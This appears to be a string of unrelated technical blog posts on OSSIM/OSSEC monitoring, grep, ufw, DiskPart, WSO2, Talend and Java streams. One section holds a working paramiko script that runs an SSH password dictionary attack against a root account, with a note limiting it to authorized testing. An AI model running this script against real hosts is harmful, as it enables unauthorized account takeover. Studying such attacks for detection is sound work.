Agentless monitoring uses SSH authentication to access the host you want to monitor. For Cisco devices (PIX, routers, etc.), you need to provide an additional parameter for the enable password. The same applies if you want to add support for "su": the su password must be supplied as the additional parameter.
1. Log into AlienVault USM.
2. Navigate to Environment -> Detection -> HIDS -> Agentless.
3. Click 'New' and add the new agentless host.
The access log is forwarded to the sensor (data source) and is then mapped to an event ID according to the OSSIM rules.
Data sources can be found under OSSIM -> Configuration -> Threat Intelligence -> Data Source; search for the source as below. Pick "AlienVault HIDS-accesslog", which reads the access log.
Pass the -n option to precede each line of output with its line number in the file:
$ grep -n 'root' /etc/passwd
Ignore word case:
$ grep -i 'word' /path/to/file
Use grep recursively under a directory:
$ grep -r 'word' /path/to/dir
Use grep to search for two different words:
$ egrep -w 'word1|word2' /path/to/file
Invert the match (print lines that do not contain the word):
$ grep -v 'word' /path/to/file
You can force grep to display output in color:
$ grep --color 'word' /path/to/file
You can limit the number of matching lines (stop after 10 matches):
$ grep -m 10 'word' /path/to/file
You can match a regular expression in files (syntax: grep "REGEX" filename):
$ grep 'word1.*word2' /path/to/file
? The preceding item is optional and matched at most once.
* The preceding item will be matched zero or more times.
+ The preceding item will be matched one or more times.
{n} The preceding item is matched exactly n times.
{n,} The preceding item is matched n or more times.
{,m} The preceding item is matched at most m times.
{n,m} The preceding item is matched at least n times, but not more than m times.
Display N lines around match
Grep can display N lines after a match (syntax: grep -A <N> "string" filename):
$ grep -A 2 'word' /path/to/file
The following example prints the matched line, along with the two lines after it:
$ grep -A 2 -i 'word' /path/to/file
-C prints N lines of context around the match, both before and after it (while -B prints only the lines before):
$ grep -C 2 'word' /path/to/file
The Linux kernel in Ubuntu provides a packet filtering system called netfilter, and the traditional interface for manipulating netfilter is the iptables suite of commands. The Uncomplicated Firewall (ufw) is a frontend for iptables and is particularly well-suited for host-based firewalls.
Allow a port from any source:
$ sudo ufw allow 122/tcp
List the application profiles and show an application's details:
$ sudo ufw app list
$ sudo ufw app info Squid
Check the UFW status:
$ sudo ufw status verbose
Allow a specific IP to reach a given port:
$ sudo ufw allow from 192.168.3.231 to any port 443
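For completeness (this command is not from the original post), a rule you added earlier can be removed by prefixing it with delete:
$ sudo ufw delete allow 122/tcp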
Unfortunately, Windows no longer supports Fdisk, but there is another good command-line tool for the job: DiskPart, which is useful for formatting the unallocated space on a USB pen drive.
1. Enter 'diskpart' in cmd; DiskPart will then start.
2. List the storage devices in the PC:
list disk
3. Select the disk to fix (in my case it is disk 1):
select disk 1
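4. Clean the disk and recreate the partition. A typical continuation using the standard DiskPart commands is shown below (a sketch; note that clean erases everything on the selected disk, so double-check the disk number first):
clean
create partition primary
format fs=fat32 quick
assign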
A brute-force attack consists of an attacker trying many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found. Alternatively, the attacker can attempt to guess the key which is typically created from the password using a key derivation function. This is known as an exhaustive key search.
Install the prerequisites:
$ apt-get install python-ipy python-nmap python-paramiko
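To illustrate the idea, here is a minimal dictionary-attack sketch using paramiko (not the post's actual script; the host, user, and wordlist.txt are hypothetical placeholders, and this should only be run against systems you are authorized to test):

import paramiko

def try_login(host, user, password):
    # Returns True if the SSH login succeeds with this password.
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(host, port=22, username=user, password=password, timeout=5)
        return True
    except paramiko.AuthenticationException:
        return False
    finally:
        client.close()

# Systematically check every candidate password until one works.
for candidate in open('wordlist.txt'):
    candidate = candidate.strip()
    if try_login('192.168.1.10', 'root', candidate):
        print('Valid password found: %s' % candidate)
        break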
In OSSEC, the rules are classified into multiple levels, from the lowest (00) to the maximum level, 16. Some levels are not used right now. The levels are detailed below:
00 - Ignored
01 - None
05 - User-generated error
06 - Low-relevance attack
08 - First time seen
12 - High-importance event
15 - Severe attack (no chance of false positives)
Rule groups are used to assign specific rules to groups. They are used for active-response purposes and for correlation.
Checking Rules
You can find the OSSEC rule list in '/var/ossec/rules'. All the XML files in this directory contain the rules.
In a rule XML file, the group name is declared at the parent level of the XML, e.g. <group name="web,accesslog,">. Inside it you can define the rules as below.
'is_simple_http_request' [1] is a function that is already built into OSSEC; if you build OSSEC from source, you can customize these functions or add new ones to improve your rules.
Testing the Rules
Initial Test Case
To test the above rules, you can add a custom log record as below.
Here we need to get the current time from the terminal in the following format: 23/Aug/2016:10:09:28 +0530
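The date command can produce a timestamp in that format, and a matching test entry can then be appended to the monitored access log (a sketch; the IP, path, and response size below are made-up values):
$ date '+%d/%b/%Y:%H:%M:%S %z'
192.168.80.5 - - [23/Aug/2016:10:09:28 +0530] "GET /index.html HTTP/1.1" 200 4523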
Here I am using a well-known OSSEC decoder; if you need a new OSSEC decoder, you can also write your own [1]. Add a new file to the OSSEC rules directory.
Creating a new OSSEC rule set
$ vi /var/ossec/rules/custom_access_rules.xml
Here I am interested in monitoring a web-user behaviour model, so I only need the 200 HTTP status code, and I mark that rule with level 05 as it is important to this use case. Make sure the rule ID is unique. I am using the 'accesslog' decoder, as I am reading a web access log here. Here is the content of my new OSSEC rule XML file.
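A minimal sketch of what such a rule file could contain (100100 is an arbitrary custom rule ID, and 31100 is the ID of OSSEC's stock parent rule that groups access-log messages; adapt both to your setup):
<group name="web,accesslog,">
  <rule id="100100" level="5">
    <if_sid>31100</if_sid>
    <id>^200$</id>
    <description>HTTP 200 response - web user behaviour monitoring.</description>
  </rule>
</group>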
We need extra user-data fields on our security event. We need to know:
the event occurrence time
the host server IP
We can achieve this by editing the particular event in '/etc/ossim/agent/plugins/ossec-single-line.cfg'. We are interested in the web group and ID 0030, and we added the line below to suit our needs.
This article explains how to trigger an action upon an event occurrence in OSSIM. There is an agent in the system with IP 192.168.80.22, and an email is to be sent to the server admins whenever this agent disconnects from and reconnects to the SIEM server. Below is the sample event.
Here are the event ID and data source ID that are of interest when the agent starts communicating with the SIEM server.
If you're familiar with SIEM tools or OSSEC, then you know syscheck. Syscheck is the integrity-checking daemon within OSSEC. Its purpose is simple: identify and report changes within the system files. Once the baseline is set, syscheck performs change detection by comparing all the checksums on each scan. If they are not a one-for-one match, it reports a change. If new files are added, it identifies them as new and reports them. Syscheck options are available in the server, local, and agent installations.
The syscheck config can be found in /var/ossec/etc/ossec.conf. The frequency option is in seconds and defaults to 22 hours (79,200 seconds). Add the line below to alert on newly added files:
<alert_new_files>yes</alert_new_files>
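For context, a minimal syscheck block could look like the following (a sketch rather than the full shipped config; the directory list is the stock default):
<syscheck>
  <frequency>79200</frequency>
  <directories check_all="yes">/etc,/usr/bin,/usr/sbin</directories>
  <alert_new_files>yes</alert_new_files>
</syscheck>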
Syscheck in OSSEC can also leverage the inotify system calls as its real-time detection engine.
You can ignore files in a directory using the rules below: either a rule with level 0, or the 'ignore' tag.
<rule id="100000" level="0">
  <if_group>syscheck</if_group>
  <match>foo/test/</match>
  <description>Ignore changes under foo/test/</description>
</rule>
or
<ignore>foo/test/</ignore>
Option attributes
realtime
check_all
check_sum
frequency
scan_day
auto_ignore
prefilter_cmd - This option can potentially impact performance negatively
By default, when a file has changed three times, further changes are automatically ignored. Handy, but it could be improved. When I'm deploying security tools and controls, my goal is to reduce the "noise" as much as possible, and a side effect of file integrity monitoring is the number of false-positive alerts generated.
A few things make my work with WSO2 ESB enjoyable, one being its support for JavaScript Object Notation (JSON) payloads in messages. It is not a very new feature; it has been around for a while.
It supports
JSON message building
Converting a payload between XML and JSON
Accessing content on JSON payloads
Logging JSON payloads
Constructing and transforming JSON payloads
Troubleshooting, debugging, and logging
Here I will explain one basic feature that is worth knowing and that makes everyday tasks easier: accessing content in JSON payloads.
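For instance, the json-eval() function takes a JSONPath expression and reads a field out of the current JSON payload (a minimal sketch assuming a payload like {"user":{"name":"john"}}; the property name is an arbitrary choice):
<log level="custom">
  <property name="user_name" expression="json-eval($.user.name)"/>
</log>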
Data integration is the combination of technical and business processes used to combine data from disparate sources into meaningful and valuable information. Today, some systems may store data in a denormalized form, and data integration tools are able to handle this. In this blog post, Talend will be used to showcase the handling of a simple denormalized data set file.
For example, a system stores state data with the following schema: [field1];[[field2.1],[field2.2]], where the schema maps to [StateID];[[StateName],[PostCode]]. Here is the sample file 'states.csv'.
This post is a very basic one. Since Talend is all about data integration, finding a BigDecimal [1] in such a data set is very common.
BigDecimal vs. Double
A BigDecimal is an exact way of representing numbers, whereas a double has a certain precision. Working with doubles of various magnitudes (say d1=1000.0 and d2=0.001) could result in the 0.001 being dropped altogether when summing, as the difference in magnitude is so large. With BigDecimal this would not happen.
The disadvantage of BigDecimal is that it's slower, and it's a bit more difficult to program algorithms that way (due to + - * and / not being overloaded).
If you are dealing with money, or precision is a must, use BigDecimal. Otherwise Doubles tend to be good enough.
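As a quick standalone illustration (not from the original post), the classic 0.1 + 0.2 case shows the difference:

import java.math.BigDecimal;

public class PrecisionDemo {
    public static void main(String[] args) {
        // double arithmetic carries binary floating-point error
        System.out.println(0.1 + 0.2); // 0.30000000000000004
        // BigDecimal values built from strings stay exact
        System.out.println(new BigDecimal("0.1").add(new BigDecimal("0.2"))); // 0.3
    }
}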
Big Decimal Sample
First we take a BigDecimal value such as '1.8772265500517E19', which means 1.8772265500517 × 10^19. We need to output it without scientific notation. You can use the 'tJava' component in Talend and simple Java to achieve this.
BigDecimal bigDecimal = new BigDecimal("1.8772265500517E19");
System.out.println(bigDecimal.toPlainString());
If you also need a specific number of decimal places, you can use the line below:
System.out.printf("%1$.2f", bigDecimal);
2 is the number of decimal places you want. You can change as you need.
There are a few ways to achieve this, such as Talend routines or the tJava component; here we use tJava. Add the lines above to its 'Basic settings' tab.
Enterprise data integration is a broad term used in the integration landscape for connecting multiple enterprise applications and hardware systems within an organization. All of these enterprise data integration efforts aim to remove complexity by simplifying data management as a whole.
Unified Data Management Architecture
The Unified Data Management architecture offers the reliability and performance of a data warehouse, the real-time and low-latency characteristics of a streaming system, and the scale and cost-efficiency of a data lake. More importantly, UDM utilizes a single storage backend with the benefits of multiple storage systems, which avoids moving data across systems and hence avoids data duplication and data consistency issues. Overall, there is less complexity to deal with.
Common In-Memory Data Interfaces
This is a new data integration pattern that depends on shared high-performance distributed storage or a common data format sitting between compute and storage; Alluxio and Apache Arrow are examples of each, respectively. Apache Arrow is supported by 13 major big data frameworks, including Calcite, Cassandra, Drill, Hadoop, HBase, Ibis, Impala, Kudu, Pandas, Parquet, Phoenix, Spark, and Storm.
Machine Learning with Data Integration
Machine learning and artificial intelligence (AI) tools are the basis of smart data integration assistants. These assistants can recommend the next best action or suggest datasets, transforms, and rules to a data engineer working on a data integration project.
Event-Driven Data Flow Architecture
More and more organizations are moving to event-driven architecture in the expectation that it can make existing systems fast and real-time. To achieve this, organizations utilize a distributed messaging system such as Apache Kafka or another message broker, and on top of it they implement concepts such as events, topics, event producers, and event consumers. A key aspect of event-driven data flow architecture is support for microservices architecture and, more specifically, the database-per-service pattern.
Lifecycle Management (LCM) plays a major role in SOA governance. WSO2 Governance Registry Lifecycle Management supports access control at multiple levels of a lifecycle state.
1. Permissions
1.1 Check items, with the permissions configuration:
<permissions>
  <permission roles=""/>
</permissions>
1.2 State transitions, by the transitionPermission configuration:
<data name="transitionPermission">
  <permission forEvent="" roles=""/>
</data>
2. Validations
2.1 Check items, by the validations configuration:
<validations>
  <validation forEvent="" class="">
    <parameter name="" value=""/>
  </validation>
</validations>
2.2 State transitions, by transitionValidation:
<data name="transitionValidation">
  <validation forEvent="" class="">
    <parameter name="" value=""/>
  </validation>
</data>
3. Resource permissions at each environment:
<permission roles=""/>
4. State transition approvals with a voting procedure:
<data name="transitionApproval">
  <approval forEvent="Promote" roles="" votes="2"/>
</data>
Use case
Just think about how a book is produced, from writing to market. A book has its own life cycle [2], which mainly contains the Acquisitions, Editorial, Production, and Marketing states.
The Acquisitions state has elements or items such as Proposal, Submit manuscript, Peer review, Approved by editorial board, and Launched into the editorial department.
The Editorial state contains Copyediting, Author review, Typesetting and design, Page proofs ready, Proofreading, and Final author review.
Book is printing and Shipped are events found in the Production state.
The Marketing state consists of Moving the book into the warehouse, Picking the publication date, Book announced, Moving the book to the bookstores, and Promotion continues.
It is not only the life cycle: a book has its own attributes (schema) [1]. You can define a new asset type in WSO2 GREG, and an asset can have a custom lifecycle. Let's add a Book asset type to WSO2 GREG with an RXT.
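A minimal RXT skeleton for such a Book asset type might look like the following (a hedged sketch based on the usual GREG RXT structure; the media type, storage path, and fields are illustrative choices, not the post's original definition):
<artifactType type="application/vnd.wso2-book+xml" shortName="books"
              singularLabel="Book" pluralLabel="Books" hasNamespace="false" iconSet="10">
    <storagePath>/books/@{overview_name}</storagePath>
    <nameAttribute>overview_name</nameAttribute>
    <content>
        <table name="Overview">
            <field type="text" required="true">
                <name>Name</name>
            </field>
            <field type="text">
                <name>Author</name>
            </field>
        </table>
    </content>
</artifactType>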
This post gives some basics of the Java Stream API, which was added in Java 8. It works very well in conjunction with lambda expressions. A pipeline of stream operations can manipulate data by performing operations like search, filter, count, sort, etc. A stream pipeline consists of a source such as an array, a collection, a generator function, or an I/O channel, and it may have zero or more intermediate operations that transform the stream.
Stream operations are divided into intermediate and terminal operations.
Intermediate operations return a new stream. They are always lazy; executing an intermediate operation such as filter does not actually perform any filtering, but instead creates a new stream that, when traversed, contains the elements of the initial stream that match the given predicate. Intermediate operations do not get executed until a terminal operation is invoked, as there is a possibility they could be processed together when a terminal operation is executed. E.g. map, filter, flatMap, limit, sorted, distinct, peek.
Terminal operations produce a non-stream result, such as a primitive value, a collection, or no value at all. Terminal operations are typically preceded by intermediate operations that return another stream, which allows operations to be connected in the form of a query. E.g. findAny, allMatch, count, max, min, etc.
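A small standalone sketch of this behaviour (not the post's linked sample): the filter's side effect only runs once the terminal count() traverses the stream.

import java.util.Arrays;
import java.util.stream.Stream;

public class LazyDemo {
    public static void main(String[] args) {
        Stream<String> s = Arrays.asList("a", "bb", "ccc").stream()
                .filter(w -> {
                    System.out.println("filtering " + w); // runs only on traversal
                    return w.length() > 1;
                });
        System.out.println("nothing filtered yet");  // printed before any filtering
        long n = s.count();                          // terminal operation runs the pipeline
        System.out.println(n + " elements matched"); // 2 elements matched
    }
}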
The sample can be found here.
Intermediate operations are further divided into stateless and stateful operations.
Stateless operations, such as filter and map, retain no state from previously seen elements when processing a new element; each element can be processed independently of operations on other elements.
Stateful operations, such as distinct and sorted, may incorporate state from previously seen elements when processing new elements. Stateful operations may need to process the entire input before producing a result. For example, one cannot produce any results from sorting a stream until one has seen all elements of the stream.
The sample can be found here. You have to be careful with these: if you use them in the wrong order, they may lead to memory issues. For example, if we sorted() the stream first, it would load everything into memory, as shown in the sample (test_sorted_notShortCircuiting).
You can see that all the elements are loaded in 'test_sorted_notShortCircuiting' even though it has a limit of 2.
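To make the point concrete, here is a standalone sketch of the same effect (not the linked sample itself): peek() fires for every element before sorted() can emit anything, even though limit(2) keeps only two results.

import java.util.stream.Stream;

public class SortedNotShortCircuiting {
    public static void main(String[] args) {
        Stream.of(5, 1, 4, 2, 3)
              .peek(n -> System.out.println("loaded: " + n)) // prints all five elements
              .sorted()                                      // stateful: buffers the whole stream
              .limit(2)                                      // short-circuits only after the sort
              .forEach(n -> System.out.println("result: " + n)); // result: 1, result: 2
    }
}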
Streams in serial or in parallel
You can execute streams in serial or in parallel. When a stream executes in parallel, the Java runtime partitions the stream into multiple sub-streams.
For example, Collection has the methods Collection.stream() and Collection.parallelStream(), which produce sequential and parallel streams respectively.
When you do that, the stream is split into multiple chunks, each chunk is processed independently, and the results are combined at the end. In a sample implementation of a sum-of-longs method, you can take advantage of parallelization and utilize all available CPU cores.
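A sketch of such a parallel sum (a standalone example, not the post's own implementation):

import java.util.stream.LongStream;

public class ParallelSum {
    public static void main(String[] args) {
        long sum = LongStream.rangeClosed(1, 10_000_000)
                             .parallel() // the runtime splits the range across CPU cores
                             .sum();     // partial sums from each chunk are combined
        System.out.println(sum);        // 50000005000000
    }
}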
Optional
In the sample you will find the new class Optional, which was introduced with Java 8. It is used to represent a value that is present or absent. The main advantage of this new construct is that it removes the need for many null checks and helps avoid runtime NullPointerExceptions, supporting us in developing clean and neat Java APIs and applications.
When a value is present, the Optional class just wraps it. Conversely, the absence of a value is modeled with an "empty" optional returned by the method Optional.empty. It's a static factory method that returns a special singleton instance of the Optional class. Dereferencing a null will invariably cause a NullPointerException, whereas Optional.empty() is a valid, workable object.
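A short sketch of the two cases:

import java.util.Optional;

public class OptionalDemo {
    public static void main(String[] args) {
        Optional<String> present = Optional.of("value");
        Optional<String> absent  = Optional.empty(); // the shared singleton, safe to use

        System.out.println(present.map(String::toUpperCase).orElse("none")); // VALUE
        System.out.println(absent.map(String::toUpperCase).orElse("none"));  // none
    }
}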